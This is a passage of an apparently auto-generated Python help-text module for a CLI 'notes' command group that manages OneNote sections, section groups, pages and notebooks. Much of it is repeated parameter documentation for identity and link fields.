\ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in users" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in users" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in users" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: 